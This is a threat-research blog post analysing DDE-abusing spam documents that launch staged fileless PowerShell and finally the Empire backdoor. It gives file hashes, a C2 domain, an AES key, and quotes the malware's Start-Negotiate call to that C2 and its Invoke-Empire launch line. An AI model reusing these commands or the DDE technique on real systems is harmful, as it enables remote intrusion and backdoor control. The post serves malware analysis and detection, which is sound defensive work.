Threat Research
Stay on top of the latest threat research, information on in-the-wild cyber attacks and cyber operations from Juniper Threat Labs.
Juniper Employee , Juniper Employee Juniper Employee
Threat Research
Macro-less Document and Fileless Malware: the perfect cloaking mechanism for new threats


At the onset of the discovery of DDE command execution attacks in October, Juniper Threat Labs discovered a series of spam messages using this technique. The Dynamic Data Exchange (DDE) is a protocol or feature in MSWord and MSExcel for sharing data between applications. Security researchers discovered that this feature can be abused to gain command executionBelow are some of the spam campaigns that Cyphort has detected that arose from this discovery. 


spam1.pngIRS Spam campaign. Sha256 of doc: 0cfab9a3365f4aabaabca4f31206d1c2d8cf82608c46af9b39d37a0936923987


spam2.pngEfax spam campaign. Docx Sha256: a1a4dbb3e8edbc1e49f16c9183ba9b70125e671c94edd10b5552b7ba365da541


spam3.pngRBC Secure spam campaign. Docx sha256: 9de0e9ac4bf682a965f3240a0d3353173086a31cafaf7dad80889e52ef7b21dc


In one example, a malicious file launches several stages of powershell scripts in memory. The attack is fileless (aside from the doc) as it did not need to write anything on the disk and it involves only powershell scripts running in the memory. The communication to the C2 server is also through SSL, which makes this threat harder to detect. The final payload is an open source powershell backdoor called “Empire”.


infection_chain.pngInfection chain

Stage 1

During our research, we identified the following malware.

File Name: Pelan Strategik PRU14 - 2.docx

Sha256: befed4808484c9d9143c55e0977779aaae114a47def832a1837f3e78775e90c8

The filename translates to Malaysian as “Strategic Plan PRU14 - 2.docx”.


Opening this file shows nothing (blank document) except for a message box to enable the “DDE”. We would need to click on the object to be able to trigger the DDE. Inside a docx file is “Document.xml” where we can find how the DDE will behave. We can easily spot the DDE with keywords “DDE” and “DDEAUTO,” although in some cases this can be obfuscated by padding xml tags in between letters. In this example, the DDEAUTO can be easily spotted.


The DDEAUTO command is invoking cmd.exe, which executes powershell to download and execute a powershell script (0.ps1) from a Dropbox storage.


Stage 2: 0.ps1


The downloaded powershell script is base64 encoded as shown by the following powershell process.


process_snapshot.pngProcess Snapshot

After decoding, it will resolve as follows:




The script will download the next stage of malware via SSL from “https://www(.)thestar(.)live:443/login/process(.)php”. The next stage is encrypted using AES-256. The first four bytes of the downloaded data, along with the constant “505dd62e251005fa796e32e9651b6310,” is used as a key to decrypt the rest of the data, from the 5th byte until the end of data. The “IEX” command at the end is indicative that it will download another powershell script. IEX is a shortcut for “Invoke-Expression” in powershell.


The next stage is also hosted on a site with HTTPS access, which likely has some untrusted certificate. It disables SSL certificate check using the following command to avoid displaying a warning popup:



Stage 3: Empire Loader

The downloaded data is another powershell script. This script will download another script from the same C2 server via SSL. But this time from “/news.php”. The downloaded data is encrypted with AES-256.



The script will execute the Start-Negotiate function with these parameters:


Start-Negotiate -s "https://www[.]thestar[.]live:443" -SK '505dd62e251005fa796e32e9651b6310' -UA 'Mozilla/5.0(WindowsNT6.1;WOW64;Trident/7.0;rv:11.0)likeGecko';

It posts data to "https://www[.]thestar[.]live:443/news.php", which returns encrypted raw data.


The IEX command at the end of the function invokes the output of the call to “Decrypt-Bytes” function, which decrypts the raw data returned by the above network connection. The resulting decrypted data is the final payload, “Empire Backdoor”.


It will invoke the “Empire Backdoor” using the following command.


[GC]::CollecT();Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE" -KillDate "REPLACE_KILLDATE" -ProxySettings $Script:Proxy;

Payload: Empire - Powershell Backdoor


The final payload is a powershell backdoor called “Empire”. This backdoor/tool is publicly available in GitHub, “” with several modifications from



Based from the description:

“Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent and a pure Python 2.6/2.7 Linux/OS X agent. It is the mergence of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptological and secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premiered at HackMiami 2016.

This does not mean that the creators of the backdoor in GitHub are the same actors behind this attack. It’s almost certain that other malicious actors are using the backdoor and weaponizing it for their own gain.

Looking at the modules, this backdoor is pretty dangerous.



The DDE feature has since been disabled to mitigate malware attacks that involve it, but it took several weeks before Microsoft finally decided to disable it. During that span of time, we have seen several threat actors utilizing this technique for cybercrime activity. It is always  important for people involved in security to stay on top of the current threat landscape.


Indicators of Compromise


Word Doc






Cyphorts detects this threat as TROJAN_DOWNLOADER.DC




Sky ATP also detects this as follows:



Top Kudoed Authors